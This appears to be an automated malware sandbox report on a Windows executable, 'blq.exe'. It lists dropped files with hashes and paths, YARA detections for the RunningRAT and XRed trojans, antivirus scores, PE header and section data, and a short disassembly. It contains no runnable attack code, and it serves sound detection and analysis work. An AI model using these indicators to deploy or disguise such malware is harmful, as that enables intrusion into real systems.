                                                                                        SSDEEP:24:GgsF+0AReISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+1+pAZewRDK4mW
                                                                                        MD5:868F02E319EF900410126266CC325B25
                                                                                        SHA1:B57A454E73AE8F9C7C5384B42BB91AB226BA0734
                                                                                        SHA-256:494791B5D4D5DB33C5465C08D7C36BC4A705F8396834B929FE74E264F141D2A1
                                                                                        SHA-512:301985A281775E375273D089D2B0201774A4C20DA4C3ABFBD14556DF8B4BA012E3FF9E559F8260FDAE0584FA41AEDC8613A542F475C5A8FC07AD69C0FCF3D2D2
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:Microsoft Excel 2007+
                                                                                        Category:dropped
                                                                                        Size (bytes):18387
                                                                                        Entropy (8bit):7.523057953697544
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.261183386677134
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+08mSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g+pAZewRDK4mW
                                                                                        MD5:717C4E5DFA701096EB8AC5A0EC650918
                                                                                        SHA1:5CBE8567D5AC7301636DD727FF7F53307FF59CDE
                                                                                        SHA-256:B17E26FF91D3C0AAC573CF0459804F1C644D7AD761DE08C0D6595E663C371F7F
                                                                                        SHA-512:DA44D5FC39BFF5B451BBCE73EE702F6345A9C56FE9A4A0BBD309C1F4B8BD058B0F2AA6D3001D4A583710CC4226734C433A86639E2B8F2C939DDBC53069B3FA18
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.267631760132345
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0pISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+KI+pAZewRDK4mW
                                                                                        MD5:98D82988103FAC4CDC30DCCEC4A7A851
                                                                                        SHA1:9E5109F82F7F5C197CF69690ED23F8CAAC12CC6A
                                                                                        SHA-256:32A8EA12144A7580C2E473BFFD7026BB7BE9628C02ED1EBC27B4B63B59F6210C
                                                                                        SHA-512:9ED36176FEC253CA5411831FC76404055EA1D1932AD13D691274F8C6B1AEFF645FC79F5B7BAA6FB893BFE110BE973BE8E4B3BA3096EE799EFF16A3D72FDBDEF0
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.2666031443331125
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0PSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8+pAZewRDK4mW
                                                                                        MD5:B27750C1E82375F0AFEA1D42ED32E58C
                                                                                        SHA1:3540919D4FAA33844150243112F9C1798A3E12A6
                                                                                        SHA-256:C8BC64BB67342F7E0CAAED990A0ED41717152BDD7ACA13B3F7AED1B4AED960FD
                                                                                        SHA-512:4D0E44787950DAF2151AC2CBC0192A648DAAE5C4564EB7290426D91FBCBA8F3DF87624A144CB6F03C2DCA67126859DC50F7A354EB7C7E578AC2522D658305C77
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.267266216002257
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0kSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                        MD5:74475920D7DCEA2A879D98D1F79EB754
                                                                                        SHA1:20EB67F5B3AB25731A302BD59E9571C33C32B0F5
                                                                                        SHA-256:3B68352C2E722946399AEC94E5279177E8C6E59523C21B1D40F1AC74056BBA6E
                                                                                        SHA-512:13F2BC375D0BBA2F2A88B64B28DEFAED816CD13D1346FD194669AB01E295A451BA70E5E42BDE2E8558D4F48543BE9885DA6C28572FD5AEBE7C76DFD7898FA115
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.267743549317712
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+I+pAZewRDK4mW
                                                                                        MD5:9404DAA31D15CBE631B1BB0C30C7C146
                                                                                        SHA1:EEFD8E3B7F7568C8DC82CC701C066052B771A579
                                                                                        SHA-256:225F95A5788191BB836F655FDDA2C4DD82AB8E860E22AD174AB093AC930DF8CC
                                                                                        SHA-512:1740BC110D22EC1EAD9A798C56DAD294FAF7DA81A7C452F939C20E18CF6A90EAB3A007395E033136BDD922DE9CF372D870FF0C5CA6B325067F650B7AAAAC8F58
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.26845675164094
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0NA4SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L4+pAZewRDK4mW
                                                                                        MD5:53D41410CD451EE513C7BE9FB49C0C73
                                                                                        SHA1:40004412F6012066FAE2BD20E3931BCCD95A2779
                                                                                        SHA-256:4F9FEAC77A41C4AE7BFB39ABA57AC25ED33809EFE04F34F071133CC553011DC6
                                                                                        SHA-512:5B2195C12554D2EA4F83476C4CBA98785A70CD4DA28B4FC7040EBCDDFAE720B57FA061EED0AA5750CF603367AB30990DE3127A3A14C94E58895D36F195A58A17
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.264657516958929
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0o86eSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+lY+pAZewRDK4mW
                                                                                        MD5:1E01084386A373D73D0BA0090CF11BD5
                                                                                        SHA1:0D601F3852EDC587C5589088195887DBCAD4E390
                                                                                        SHA-256:339A167FEB3940A676ED342DF622216CFCAA4183B0CDE7DE36187EB0A1EDDF25
                                                                                        SHA-512:E4D4C2AEB0A17998E79A1B13526A08A03EB6596CEF0FC5EB9B1D0440202B0DBD44B18CE9B136E878BB7396F73C0F682DE60E51316F1523D219AE5519E81A25F2
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.274499989347445
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0YlSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+t+pAZewRDK4mW
                                                                                        MD5:278F1E4907F8DBF1A87B81A1A2B144D6
                                                                                        SHA1:70E319180963700C9F97DBDD3E5E1633674917D5
                                                                                        SHA-256:EAFB9806C4BF495E52711AFFFE5130E7EA0474E669E9EDE6C1E23F289F0188EF
                                                                                        SHA-512:260A74963CD433837B04F0C39E376D764B1D430A8180B9DC4D867553409DD648A2F7DE13DD0AD4BD154EE6E40FB13683922BDFC7AAD57B645647ACC7AAE90C4C
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.277329223139874
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+0QkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w+pAZewRDK4mW
                                                                                        MD5:BCD93269CB043B13769AEABB8973A221
                                                                                        SHA1:D2F891A31338E52461D7E39DE06EAC6BEE86FE54
                                                                                        SHA-256:99B8E77560806535023B626FC4161E7AAB70AB0B784179E3FB5FAE0CC9195C65
                                                                                        SHA-512:E93DC472688B3F12C7299E03D877937C39A8EE4308A39E018B24DA1BAF3C68618D0E140B7FE702C64437F939334924DA3CCDAB8278AB39FDF4D6C11E6A4404F0
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.267469673831808
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+05tmSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+V+pAZewRDK4mW
                                                                                        MD5:6252DF6F2638FE8FC40592CDE3F36286
                                                                                        SHA1:A2CDFE5A85B5CE3804D1B88E1C84E802E0055EDA
                                                                                        SHA-256:E93C088C0A2F5092E96738711F79F86DB2D2828A4897AE7B209AD8FA6ED50C9C
                                                                                        SHA-512:55443F798B72458CC7185FAE347929B519496078C9E61AF5F93FEF87E44E55366861DF4C40AA3ED20A0F376E1017207A9D1B60F2725D827455C838C4661ED1EC
                                                                                        Malicious:false
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):1652
                                                                                        Entropy (8bit):5.2519670130759755
                                                                                        Encrypted:false
                                                                                        SSDEEP:24:GgsF+03DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+8D+pAZewRDK4mW
                                                                                        MD5:DB29CFD50DC6F393EC99816EFD33CF3F
                                                                                        SHA1:86C9B8D7FF6817231A60A94B4F2D94B9BEC7816F
                                                                                        SHA-256:E3F60F1D57801718E241E1118A92DC18CA4C6120BF9DCB9D1D81C49C28D65639
                                                                                        SHA-512:ED7BE4D89FD6699309C7EB72A9AE01D516B829BBB290BE420EAD09292CB50788CC07F338A0DDCB993E99B6590FF275FF91844A8C2DED0EF18A3C0FDBAC63B2EE
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):165
                                                                                        Entropy (8bit):1.4377382811115937
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                        MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                        SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                        SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                        SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                        Malicious:false
                                                                                        Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:Composite Document File V2 Document, Cannot read section info
                                                                                        Category:dropped
                                                                                        Size (bytes):32768
                                                                                        Entropy (8bit):3.746897789531007
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                        MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                        SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                        SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                        SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                        Malicious:false
                                                                                        Process:C:\Users\user\Desktop\blq.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):49152
                                                                                        Entropy (8bit):5.2490926306073815
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:zynb12Aw5J6HC4kq5Jp9bjAzhyY55J+NStcEeUlyqgZl4p67ohPC:Ub1MsHz3JDwhyWr+N95OTga6L
                                                                                        MD5:2C8E6B45F0113B45F9187B60DF114FEF
                                                                                        SHA1:7E7B6F59FCED74C16BEF14F03F19EEECB5D34103
                                                                                        SHA-256:476328C1BA85A1DF9B0E678B9219DD1D5E529596303896049797683F20AD23E2
                                                                                        SHA-512:3A415E14CE61E0DFBDD1064F39B129F11EE1419442C49209E62C90D54D57B4A9EF8544F2108BF562EC9D8C9DD3DAA3221A4B670918BA48AF68CA439921301337
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_RunningRAT, Description: Yara detected RunningRAT, Source: C:\Users\user\Desktop\._cache_blq.exe, Author: Joe Security
                                                                                        • Rule: GoldDragon_RunningRAT, Description: Detects Running RAT from Gold Dragon report, Source: C:\Users\user\Desktop\._cache_blq.exe, Author: Florian Roth
                                                                                        • Rule: MALWARE_Win_RunningRAT, Description: Detects RunningRAT, Source: C:\Users\user\Desktop\._cache_blq.exe, Author: ditekSHen
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9..tW..tW..tW.h[..tW..{...tW.DhY..tW.k]..tW.kS..tW..RS..tW..tV.[tW..R\..tW..rQ..tW.Rich.tW.........PE..L....w.T................. ...........(.......0....@.............................................................................d....................................................................................0...............................text............ .................. ..`.data....x...0.......0..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:Microsoft Excel 2007+
                                                                                        Category:dropped
                                                                                        Size (bytes):18387
                                                                                        Entropy (8bit):7.523057953697544
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                        MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                        SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                        SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                        SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                        Malicious:false
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):165
                                                                                        Entropy (8bit):1.4377382811115937
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                        MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                        SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                        SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                        SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                        Malicious:false
                                                                                        Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):771584
                                                                                        Entropy (8bit):6.622826360248542
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9I5r:ansJ39LyjbJkQFMhmC+6GD9G
                                                                                        MD5:64C0A5B375F1AB0C44808320D5AF9E84
                                                                                        SHA1:F24C7694E6CF1763C1A98BD1A27152BED1EBFF82
                                                                                        SHA-256:05B222D35057310611697B4D0EE99656F9956BD421785AEDFA3B928000F07801
                                                                                        SHA-512:2353837EB7A446CEF1863C1488204619716F4BEB14371FBC9F1D6A07D3336452F7DA8E6A078C4335EA2086494F292908C7DCA5C8A7F1A371CD9DC14F997EC217
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 100%
                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):55
                                                                                        Entropy (8bit):4.306461250274409
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                        Malicious:false
                                                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                        Process:C:\Windows\SysWOW64\svchost.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):61440
                                                                                        Entropy (8bit):6.199746098562656
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:H9ykYCTdiHQKrFXmw2RQln5IUmDjoX6+:HlMHprF2nRQln5I
                                                                                        MD5:889B99C52A60DD49227C5E485A016679
                                                                                        SHA1:8FA889E456AA646A4D0A4349977430CE5FA5E2D7
                                                                                        SHA-256:6CBE0E1F046B13B29BFA26F8B368281D2DDA7EB9B718651D5856F22CC3E02910
                                                                                        SHA-512:08933106EAF338DD119C45CBF1F83E723AFF77CC0F8D3FC84E36253B1EB31557A54211D1D5D1CB58958188E32064D451F6C66A24B3963CCCD3DE07299AB90641
                                                                                        Malicious:false
                                                                                        Antivirus:
                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                        Joe Sandbox View:
• Filename: nsdksetup.dll, Detection: malicious
• Filename: #U63d0#U53d6Proxy.exe, Detection: malicious
• Filename: #U4ee3#U7406.exe, Detection: malicious
• Filename: #U63d0#U53d6Proxy (1).exe, Detection: malicious
• Filename: V6bBcEdp5a.dll, Detection: malicious
• Filename: l10U7QN0CY.dll, Detection: malicious
• Filename: KlzXRW4Ag7.dll, Detection: malicious
• Filename: ZfJheGhddq.dll, Detection: malicious
• Filename: PD5dVJNpz7.dll, Detection: malicious
• Filename: 7YtmCkMUx3.dll, Detection: malicious
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.465645968958063
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:cIXfpi67eLPU9skLmb0b4jWSPKaJG8nAgejZMMhA2gX4WABl0uN9dwBCswSb8:hXD94jWlLZMM6YFHf+8
                                                                                        MD5:F44638F3AF9A81AACDE5B022701CDB2C
                                                                                        SHA1:BFF87D180E690FA03729A97A36FB4CBBC12AE614
                                                                                        SHA-256:57474F88AB4D4933DB600C57736FFB713E4ADB1F8EA1E86B8B714A7C902A23A9
                                                                                        SHA-512:5C65FA451646FEA6518021344F7F609F6579CCB366045A3409351A7C9C88520D9836190E728F30C5A234B9FD04927A82EF612DFF983762AA25BFDA487F4AACD4
                                                                                        Malicious:false
                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):6.5618190433891295
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 93.58%
                                                                                        • Win32 Executable Borland Delphi 7 (665061/41) 6.22%
                                                                                        • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        File name:blq.exe
                                                                                        File size:820'736 bytes
                                                                                        MD5:6153a06b74491bacb664bf142b598c69
                                                                                        SHA1:dade36a11a568e3b0b5f3e7fd44b566182702534
                                                                                        SHA256:0b510380e52b3c97e7a2f227eb9ecda6a194885da74fac6630f1eb7d5ee6091f
                                                                                        SHA512:bb1c20ce4b2ae5e3524e1127eca6047ab897da49d8b66e435e8d81f418dc16c7c6345887ae67c9ca7ea0f39d175eedace8dabc74be9db9ea492ca4c489ec4721
                                                                                        SSDEEP:12288:GMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9zl6MMuj:GnsJ39LyjbJkQFMhmC+6GD99h
                                                                                        TLSH:31058E22F2D18437D1321A3D9C6BA3A5582ABE512E38794F7BF42E4D5F3D68138252D3
                                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                        Icon Hash:71b018dccec77331
                                                                                        Entrypoint:0x49ab80
                                                                                        Entrypoint Section:CODE
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                        DLL Characteristics:
                                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                        Instruction
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        add esp, FFFFFFF0h
                                                                                        mov eax, 0049A778h
                                                                                        call 00007F37F0D47F6Dh
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        call 00007F37F0D9B8B5h
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        mov edx, 0049ABE0h
                                                                                        call 00007F37F0D9B4B4h
                                                                                        mov ecx, dword ptr [0049DBDCh]
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        mov edx, dword ptr [00496590h]
                                                                                        call 00007F37F0D9B8A4h
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        call 00007F37F0D9B918h
                                                                                        call 00007F37F0D45A4Bh
                                                                                        add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2a42 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x1dd30 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0xa980 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0xa4018 | 0x21 | .rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xa4000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x99bec | 0x99c00 | 33fbe30e8a64654287edd1bf05ae7c8c | False | 0.5141641260162602 | data | 6.572957870355296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0x9b000 | 0x2e54 | 0x3000 | 1f5e19e7d20c1d128443d738ac7bc610 | False | 0.453125 | data | 4.854620797809023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0x9e000 | 0x11e5 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xa0000 | 0x2a42 | 0x2c00 | 21ff53180b390dc06e3a1adf0e57a073 | False | 0.3537819602272727 | data | 4.919333216027082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xa3000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xa4000 | 0x39 | 0x200 | a92cf494c617731a527994013429ad97 | False | 0.119140625 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J" | 0.7846201577093705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0xa5000 | 0xa980 | 0xaa00 | dcd1b1c3f3d28d444920211170d1e8e6 | False | 0.5899816176470588 | data | 6.674124985579511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0xb0000 | 0x1dd30 | 0x1de00 | daf146f8e49cbca77b0d76e82c3dc4bf | False | 0.46090481171548114 | data | 5.534450490781437 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0xb0dc8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" |  |  | 0.38636363636363635
RT_CURSOR | 0xb0efc | 0x134 | data |  |  | 0.4642857142857143
RT_CURSOR | 0xb1030 | 0x134 | data |  |  | 0.4805194805194805
RT_CURSOR | 0xb1164 | 0x134 | data |  |  | 0.38311688311688313
